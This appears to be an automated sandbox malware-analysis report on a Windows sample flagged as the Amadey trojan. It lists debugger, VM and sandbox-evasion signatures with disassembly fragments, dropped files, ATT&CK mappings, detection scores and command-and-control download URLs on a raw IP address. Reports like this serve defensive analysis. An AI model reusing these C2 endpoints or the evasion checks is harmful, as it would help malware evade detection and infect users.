Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6152E second address: 4D6155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f jmp 00007F68C0B5CAF1h 0x00000014 popad 0x00000015 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000019 pushad 0x0000001a pushad 0x0000001b mov eax, 0B5ABF09h 0x00000020 mov cl, 42h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6155F second address: 4D615F2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F68C0520B4Dh 0x00000008 sbb cx, 1696h 0x0000000d jmp 00007F68C0520B51h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 or dword ptr [edx+40h], FFFFFFFFh 0x0000001a pushad 0x0000001b call 00007F68C0520B4Ch 0x00000020 pushfd 0x00000021 jmp 00007F68C0520B52h 0x00000026 sbb eax, 30371DE8h 0x0000002c jmp 00007F68C0520B4Bh 0x00000031 popfd 0x00000032 pop eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F68C0520B4Fh 0x0000003b or ecx, 739A2D2Eh 0x00000041 jmp 00007F68C0520B59h 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D615F2 second address: 4D61614 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop esi 0x00000009 jmp 00007F68C0B5CAEAh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F68C0B5CAEAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61614 second address: 4D61618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61618 second address: 4D6161E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6161E second address: 4D61637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61637 second address: 4D6163B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6163B second address: 4D61658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D40EAE second address: 4D40EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Special instruction interceptor: First address: 81CC70 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Special instruction interceptor: First address: 9BC8D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Special instruction interceptor: First address: 9CD41E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Special instruction interceptor: First address: A4EC61 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00AACCAD rdtsc

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window / User API: threadDelayed 1100			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window / User API: threadDelayed 1360			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window / User API: threadDelayed 1000			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window / User API: threadDelayed 1104			Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5956	Thread sleep count: 55 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5956	Thread sleep time: -110055s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 70 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 95 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 86 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 3704	Thread sleep count: 1100 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 3704	Thread sleep time: -2201100s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 91 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 89 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 175 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 178 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 33 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 6936	Thread sleep count: 189 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5976	Thread sleep count: 1360 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5976	Thread sleep time: -2721360s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 1012	Thread sleep count: 1000 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 1012	Thread sleep time: -2001000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5172	Thread sleep count: 1104 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5172	Thread sleep time: -2209104s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 3660	Thread sleep count: 80 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 3660	Thread sleep time: -160080s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5976	Thread sleep count: 43 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe TID: 5976	Thread sleep time: -86043s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00415D07 FindFirstFileExW,		0_2_00415D07
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_10007EA9 FindFirstFileExW,		0_2_10007EA9
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B55F6E FindFirstFileExW,		0_2_04B55F6E

Source: 7JKssbjRDa.exe, 7JKssbjRDa.exe, 00000000.00000002.3028161823.000000000099D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: 7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000001004000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000002.3033624379.0000000005598000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 7JKssbjRDa.exe, 00000000.00000002.3028161823.000000000099D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 7JKssbjRDa.exe, 00000000.00000002.3033624379.0000000005598000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh2
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Thread information set: HideFromDebugger

Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_04D6127D Start: 04D61365 End: 04D6128C

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File opened: NTICE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File opened: SICE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00AACCAD rdtsc

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D02A6F mov eax, dword ptr fs:[00000030h]		0_3_04D02A6F
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CFE30D mov eax, dword ptr fs:[00000030h]		0_3_04CFE30D
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]		0_2_0041366F
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]		0_2_0040EF0D
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]		0_2_10007A76
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]		0_2_10005F25
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00F4AAB3 push dword ptr fs:[00000030h]		0_2_00F4AAB3
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]		0_2_04B40D90
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h]		0_2_04B538D6
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]		0_2_04B4092B
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h]		0_2_04B4F174
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04D602FA mov eax, dword ptr fs:[00000030h]		0_2_04D602FA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04D602E4 mov eax, dword ptr fs:[00000030h]		0_2_04D602E4
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04D60000 mov eax, dword ptr fs:[00000030h]		0_2_04D60000
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04D6031E mov eax, dword ptr fs:[00000030h]		0_2_04D6031E
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04D60333 mov eax, dword ptr fs:[00000030h]		0_2_04D60333

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0040C0B3
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00409949 SetUnhandledExceptionFilter,		0_2_00409949
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00408ED5
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_004097B2
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_10002ADF
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_100056A0
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_10002FDA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_04B4913C
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B49A19
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B49BB0 SetUnhandledExceptionFilter,		0_2_04B49BB0
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B4C31A

Source: 7JKssbjRDa.exe, 7JKssbjRDa.exe, 00000000.00000002.3028161823.000000000099D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: q`WProgram Manager

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_3_04CF8DB3 cpuid

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	781 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	24 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	13 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	223 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7JKssbjRDa.exe	48%	Virustotal		Browse
7JKssbjRDa.exe	55%	ReversingLabs	Win32.Trojan.Amadey
7JKssbjRDa.exe	100%	Avira	HEUR/AGEN.1320706
7JKssbjRDa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp	false		unknown
http://185.156.73.23/dll/download	false		unknown
http://185.156.73.23/files/download	false		unknown
http://185.156.73.23/dll/key	false		unknown
http://185.156.73.23/soft/download	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.156.73.23/dll/downloadQ	7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloads	7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g-cleanit.hk	7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000585D000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943755516.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944183260.000000000595F000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944399223.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000595B000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942066363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943967641.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942621168.000000000595F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/files/downloady	7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
http://185.156.73.23/dll/download_	7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empt	7JKssbjRDa.exe, 00000000.00000002.3033624379.0000000005580000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/dll/key5	7JKssbjRDa.exe, 00000000.00000002.3033624379.0000000005580000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000585D000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943755516.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944183260.000000000595F000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944399223.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000595B000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942066363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943967641.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942621168.000000000595F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/soft/downloadg	7JKssbjRDa.exe, 00000000.00000002.3029506436.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
